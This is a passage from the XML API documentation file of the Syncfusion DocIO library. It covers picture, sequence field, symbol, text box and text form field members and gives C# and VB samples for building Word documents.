            Otherwise it is positioned according to the alignment specified. The position of the object is relative to <see cref="P:Syncfusion.DocIO.DLS.WPicture.VerticalOrigin"/>.
            </remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.IsBelowText">
            <summary>
            Gets or sets a value indicating whether the picture is below the text.
            </summary>
            <value><b>True </b>if the picture is below text; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.PictureCharacterFormat">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.ShapeId">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.OPictureHRef">
            <summary>
            Gets or Sets picture hRef string
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.IsHeaderPicture">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.PictureShape">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.Size">
            <summary>
            Gets/sets the size of picture object.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.IsMetaFile">
            <summary>
            Gets a value indicating whether this instance is metafile.
            </summary>
            <value>
            	if this instance is metafile, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.DocxProps">
            <summary>
            Gets the additional docx properties.
            </summary>
            <value>The docx props.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.AlternativeText">
            <summary>
            Gets or sets the alternate text for the picture.
            </summary>
            <value>The <b>string</b> that represents the alternate text.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.Name">
            <summary>
            Gets or sets the name of the picture.
            </summary>
            <value>The <b>string</b> that represents the name.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.ChromaKeyColor">
            <summary>
            Gets or sets the chromakey color (picture transparency).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.Title">
            <summary>
            Gets or sets the picture title.
            </summary>
            <value>The <b>string</b> that represents the title.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.EmbedBody">
            <summary>
            Embedded text body
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.IsShape">
            <summary>
            Gets or sets a value indicating whether this instance is shape.
            </summary>
            <value>
            	if this instance is shape, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.OrderIndex">
            <summary>
            Gets or sets the index of the order.
            </summary>
            <value>The index of the order.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.LayoutInCell">
            <summary>
            Returns the boolean value that represents whether a picture in a table is displayed inside or outside the table.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.AllowOverlap">
            <summary>
            Gets or sets a value indicating whether [allow overlap].
            </summary>
            <value>
              <c>true</c> if [allow overlap]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.WrapPolygon">
            <summary>
            Gets or sets the wrap polygon.
            </summary>
            <value>
            The wrap polygon.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.Visible">
            <summary>
            Gets or sets a value indicating whether the picture is visible.
            </summary>
            <value>
              <b>True</b> if the picture is visible; otherwise, <b>false</b>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.IsWrappingBoundsAdded">
            <summary>
            Gets or sets a value indicate whether current wrapping bounds points added to the list or not.
            </summary>
            <value>
            <c>true</c> if this instance is wrapping bounds added; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.FillFormat">
            <summary>
            Gets or sets fill format.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WSeqField">
            <summary>
            Represents the sequence field in the Word document.
            </summary>
            <example>
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument("Bookmarks.docx");
                //Add new paragraph to the section
                WParagraph paragraph = document.Sections[0].AddParagraph() as WParagraph;
                //Append sequence field to the paragraph
                WSeqField field = (WSeqField)paragraph.AppendField("Sequence field", FieldType.FieldSequence);
                //Set the bookmark name as caption and number format
                field.CaptionName = "Northwind";
                field.NumberFormat = CaptionNumberingFormat.Roman;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument("Bookmarks.docx")
                'Add new paragraph to the section
                Dim paragraph As WParagraph = TryCast(document.Sections(0).AddParagraph(), WParagraph)
                'Append sequence field to the paragraph
                Dim field As WSeqField = DirectCast(paragraph.AppendField("Sequence field", FieldType.FieldSequence), WSeqField)
                'Set the bookmark name as caption and number format
                field.CaptionName = "Northwind"
                field.NumberFormat = CaptionNumberingFormat.Roman
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WSeqField.m_numberFormat">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSeqField.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WSeqField"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSeqField.#ctor(Syncfusion.DocIO.DLS.WField)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WSeqField"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.WField"/> instance.
            </summary>
            <param name="field">The <see cref="T:Syncfusion.DocIO.DLS.WField"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSeqField.ClearSwitchString">
            <summary>
            Removes the Switch String befor apply new switch
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSeqField.ConvertSwitchesToString">
            <summary>
            Converts the switches to string.
            </summary>
            <returns>The string that specifies the switches.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSeqField.EntityType">
            <summary>
            Gets the type of the entity. Read-only
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSeqField.FormattingString">
            <summary>
            Gets the formatting string of the sequence field. Read-only.
            </summary>
            <value>The <b>string</b> that specifies the formatting text.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSeqField.NumberFormat">
            <summary>
            Gets or sets the type of caption numbering.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.CaptionNumberingFormat"/> member that specifies the format for caption numbering.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSeqField.CaptionName">
            <summary>
            Gets or sets caption name.
            </summary>
            <value>The <b>string</b> that specifies the caption name.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WSymbol">
            <summary>
            Represents a symbol in the Word document.
            </summary>
            <example>
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("Example of adding symbols to the paragraph: ");
                //Insert symbol with character code 100
                WSymbol symbol = paragraph.AppendSymbol(100);
                symbol.FontName = "Windings";
                //Save and close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("Example of adding symbols to the paragraph: ")
                'Insert symbol with character code 100
                Dim symbol As WSymbol = paragraph.AppendSymbol(100)
                symbol.FontName = "Windings"
                'Save and close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WSymbol.m_fontName">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSymbol.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initialize a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WSymbol"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSymbol.CreateLayoutInfo">
            <summary>
            Creates layout information.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSymbol.CloneImpl">
            <summary>
            Creates a duplicate copy of the entity.
            <exclude/>
            </summary>
            <returns>The reference to the newly created object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSymbol.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSymbol.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSymbol.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSymbol.Syncfusion#Layouting#ILeafWidget#Measure(Syncfusion.DocIO.Rendering.DrawingContext)">
            <summary>
            Gets the size of the symbol for lay outing.
            </summary>
            <param name="dc"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSymbol.GetFont(Syncfusion.DocIO.Rendering.DrawingContext)">
            <summary>
            Get Symbol font
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSymbol.Syncfusion#Layouting#IWidget#InitLayoutInfo">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSymbol.EntityType">
            <summary>
            Gets the type of the entity. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSymbol.CharacterFormat">
            <summary>
            Gets the character format for the symbol. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSymbol.FontName">
            <summary>
            Gets or sets font name for the symbol.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSymbol.CharacterCode">
            <summary>
            Gets or sets symbol's character code.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSymbol.CharCodeExt">
            <summary>
            Get/set character code extension.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WTextBox">
            <summary>
            Represents the textbox in the Word document.
            </summary>
            <example>
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Append new textbox to the paragraph
                IWTextBox textbox = paragraph.AppendTextBox(150, 75);
                //Add new text to the textbox body
                IWParagraph textboxParagraph = textbox.TextBoxBody.AddParagraph();
                textboxParagraph.AppendText("Text inside text box");
                textboxParagraph = textbox.TextBoxBody.AddParagraph();
                //Add new picture to textbox body
                IWPicture picture = textboxParagraph.AppendPicture(Image.FromFile(@"Image.png"));
                picture.Height = 75;
                picture.Width = 50;
                //Save and close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Append new textbox to the paragraph
                Dim textbox As IWTextBox = paragraph.AppendTextBox(150, 75)
                'Add new text to the textbox body
                Dim textboxParagraph As IWParagraph = textbox.TextBoxBody.AddParagraph()
                textboxParagraph.AppendText("Text inside text box")
                textboxParagraph = textbox.TextBoxBody.AddParagraph()
                'Add new picture to textbox body
                Dim picture As IWPicture = textboxParagraph.AppendPicture(Image.FromFile("Image.png"))
                picture.Height = 75
                picture.Width = 50
                'Save and close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WTextBox.m_textBody">
            <summary>
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WTextBox.m_txbxFormat">
            <summary>
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBox.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initialize a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WTextBox"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBox.AddSelf">
            <summary>
            Adds the self.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBox.AttachToDocument">
            <summary>
            Executes when the entity is attached to the owner document.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBox.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
            <param name="doc">The doc.</param>
            <param name="nextOwner"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBox.CloneImpl">
            <summary>
            Creates a duplicate copy of the entity.
            <exclude/>
            </summary>
            <returns>A reference to the newly created object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBox.CreateLayoutInfo">
            <summary>
            Creates layout information.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBox.Detach">
            <summary>
            Detaches from owner.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBox.GetNextTextBodyItem">
            <summary>
            Gets the next text body item.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBox.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBox.SetTextBody(Syncfusion.DocIO.DLS.WTextBody)">
            <summary>
            Sets the text body.
            </summary>
            <param name="textBody">The text body.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBox.GetAsTable(System.Int32)">
            <summary>
            Gets as table.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBox.GetRightMarginHorizPosition(System.Single,System.Single,Syncfusion.DocIO.ShapeHorizontalAlignment,System.Single,System.Single,Syncfusion.DocIO.DLS.TextWrappingStyle)">
            <summary>
            
            </summary>
            <param name="pageWidth"></param>
            <param name="rightMargin"></param>
            <param name="horzAlignment"></param>
            <param name="horzPosition"></param>
            <param name="shapeWidth"></param>
            <param name="textWrapStyle"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBox.GetLeftMarginHorizPosition(System.Single,Syncfusion.DocIO.ShapeHorizontalAlignment,System.Single,System.Single,Syncfusion.DocIO.DLS.TextWrappingStyle)">
            <summary>
            
            </summary>
            <param name="leftMargin"></param>
            <param name="horzAlignment"></param>
            <param name="horzPosition"></param>
            <param name="shapeWidth"></param>
            <param name="textWrapStyle"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBox.GetHorAlign(Syncfusion.DocIO.ShapeHorizontalAlignment)">
            <summary>
            Gets the horizontal alignment.
            </summary>
            <param name="shapeAlign">The shape align.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBox.GetBordersStyle(Syncfusion.DocIO.DLS.TextBoxLineStyle)">
            <summary>
            Gets the border style.
            </summary>
            <param name="lineStyle">The line style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBox.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBox.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBox.Syncfusion#Layouting#ILeafWidget#Measure(Syncfusion.DocIO.Rendering.DrawingContext)">
            <summary>
            
            </summary>
            <param name="cg"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBox.Syncfusion#Layouting#IWidget#InitLayoutInfo">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBox.Name">
            <summary>
            Gets or sets the name of the text box.
            </summary>
            <value>
            The <b>string</b> that represents the name.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBox.Visible">
            <summary>
            Gets or sets a value indicating whether this <see cref="T:Syncfusion.DocIO.DLS.WTextBox"/> is visible.
            </summary>
            <value>
              <b>True</b> if visible; otherwise, <b>false</b>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBox.ChildEntities">
            <summary>
            Gets the child elements of the text box. Read-only.
            </summary>
            <value>The collection of child elements.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBox.EntityType">
            <summary>
            Gets the type of the entity. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBox.TextLayoutingBounds">
            <summary>
            Gets or sets  Text content layouting bounds for textbox
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBox.IsShape">
            <summary>
            Determine whether the textbox as shape
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBox.TextBoxFormat">
            <summary>
            Gets or sets the text box format.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBox.TextBoxBody">
            <summary>
            Gets the text body of the text box. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBox.TextBoxSpid">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBox.CharacterFormat">
            <summary>
            Gets the character format.
            </summary>
            <value>The character format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBox.Shape">
            <summary>
            Gets or sets the shape.Added to preserve the choice item porperties of rectangular shape
            </summary>
            <value>
            The shape.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WTextFormField">
            <summary>
            Represents the text form field in the Word document.
            </summary>
            <example>
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                WParagraph paragraph = section.AddParagraph() as WParagraph;
                paragraph.AppendText("General Information");
                section.AddParagraph();
                paragraph = section.AddParagraph() as WParagraph;
                IWTextRange text = paragraph.AppendText("Name\t");
                text.CharacterFormat.Bold = true;
                //Append Text form field 
                WTextFormField textfield = paragraph.AppendTextFormField(null);
                //Set type of Text form field
                textfield.Type = TextFormFieldType.RegularText;
                textfield.CharacterFormat.FontName = "Calibri";
                textfield.CalculateOnExit = true;
                section.AddParagraph();
                paragraph = section.AddParagraph() as WParagraph;
                text = paragraph.AppendText("Date of Birth\t");
                text.CharacterFormat.Bold = true;
                //Append Text form field
                textfield = paragraph.AppendTextFormField("Date field", DateTime.Now.ToString("MM/DD/YY"));
                textfield.StringFormat = "MM/DD/YY";
                //Set Text form field type
                textfield.Type = TextFormFieldType.DateText;
                textfield.CalculateOnExit = true;
                //Save the Word document
                document.Save("Textfield.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As WParagraph = TryCast(section.AddParagraph(), WParagraph)
                paragraph.AppendText("General Information")
                section.AddParagraph()
                paragraph = TryCast(section.AddParagraph(), WParagraph)
                Dim text As IWTextRange = paragraph.AppendText("Name" &amp; vbTab)
                text.CharacterFormat.Bold = True
                'Append Text form field 
                Dim textfield As WTextFormField = paragraph.AppendTextFormField(Nothing)
                'Set type of Text form field
                textfield.Type = TextFormFieldType.RegularText
                textfield.CharacterFormat.FontName = "Calibri"
                textfield.CalculateOnExit = True
                section.AddParagraph()
                paragraph = TryCast(section.AddParagraph(), WParagraph)
                text = paragraph.AppendText("Date of Birth" &amp; vbTab)
                text.CharacterFormat.Bold = True
                'Append Text form field
                textfield = paragraph.AppendTextFormField("Date field", DateTime.Now.ToString("MM/DD/YY"))
                textfield.StringFormat = "MM/DD/YY"
                'Set Text form field type
                textfield.Type = TextFormFieldType.DateText
                textfield.CalculateOnExit = True
                'Save the Word document
                document.Save("Textfield.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WTextFormField.DEF_TEXT">
            <summary>
            Default text of form field.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WTextFormField.m_formFieldType">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextFormField.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WTextFormField"/> class.
            </summary>
            <param name="doc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextFormField.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextFormField.CloneImpl">
            <summary>
            Creates a duplicate copy of the entity.
            <exclude/>
            </summary>
            <returns>The reference to the newly created object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextFormField.GetFirstTextRange">
            <summary>
            Gets the first text range.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextFormField.GetTextRange">
            <summary>
            Gets the text range.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextFormField.UpdateTextForTextBodyItem(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Updates the text for text body item.
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextFormField.UpdateTextForTable(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Updates the text for table.
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextFormField.UpdateTextForParagraphItem(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Updates the text for paragraph item.
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextFormField.SetTextRange(Syncfusion.DocIO.DLS.WTextRange)">
            <summary>
            Sets the text range.
            </summary>
            <param name="textRange">The text range.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextFormField.RemovePreviousText">
            <summary>
            Removes the previous text.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextFormField.RemoveTextBodyItem(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Removes the text body item.
            </summary>
            <param name="entity">The entity.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextFormField.InsertParagraphItems(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Inserts the paragraph items.
            </summary>
            <param name="paragraph">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextFormField.RemoveParagraphItem(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Removes the paragraph item.
            </summary>
            <param name="entity">The entity.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextFormField.AppendDateTimeField(Syncfusion.DocIO.FieldType)">
            <summary>
            Appends the date field.
            </summary>
            <param name="fieldType">Type of the field.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextFormField.SetTextFormFieldType(Syncfusion.DocIO.TextFormFieldType)">
            <summary>
            Sets the type of the text form field.
            </summary>
            <param name="txtFormFieldType">Type of the text form field.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextFormField.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextFormField.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextFormField.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextFormField.CreateLayoutInfo">
            <summary>
            Creates layout information.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextFormField.Syncfusion#Layouting#IWidget#InitLayoutInfo">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextFormField.EntityType">
            <summary>
            Gets the type of the entity. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextFormField.Type">
            <summary>
            Gets or sets text form field type.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.TextFormFieldType"/> member that specifies the type of text form field.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextFormField.StringFormat">
            <summary>
            Gets or sets the string text format (text, date/time, number) directly.
            </summary>
            <value>The <b>string</b> that specifies the text format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextFormField.DefaultText">
            <summary>
            Gets or sets the default text for text form field.
            </summary>
            <value>The <b>string</b> that specifies the default text.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextFormField.MaximumLength">
            <summary>
            Gets or sets the maximum text length of the text form field.
            </summary>
            <value>The <b>integer</b> that specifies the maximum length of the text.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextFormField.TextRange">
            <summary>
            Gets or sets the form field text range.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WTextRange"/> instance that specifies the form field text.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextFormField.Text">
            <summary>
            Gets or sets the text of text form field.
            </summary>
            <value>The <b>string</b> that specifies the text.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.CharacterPropertiesConverter">
            <summary>
            The CHPX converter.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CharacterPropertiesConverter.CHPToFormat(Syncfusion.DocIO.ReaderWriter.IWordReaderBase,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            CHPs to format.
            </summary>
            <param name="reader">The reader.</param>
            <param name="format">The format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CharacterPropertiesConverter.CHPToFormat(Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            CHPs to format.
            </summary>
            <param name="source">The source.</param>
            <param name="destination">The destination.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CharacterPropertiesConverter.FormatToCHP(Syncfusion.DocIO.DLS.WCharacterFormat,Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties)">
            <summary>
            Converts CharacterFormat to CharacterProperties.
            </summary>
            <param name="source">The source.</param>
            <param name="charProps">The char props.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CharacterPropertiesConverter.FormatToProp(System.Int32,System.Object,Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Converts property from characterFormat property to characterProperty.
            </summary>
            <param name="propertyKey">The property key.</param>
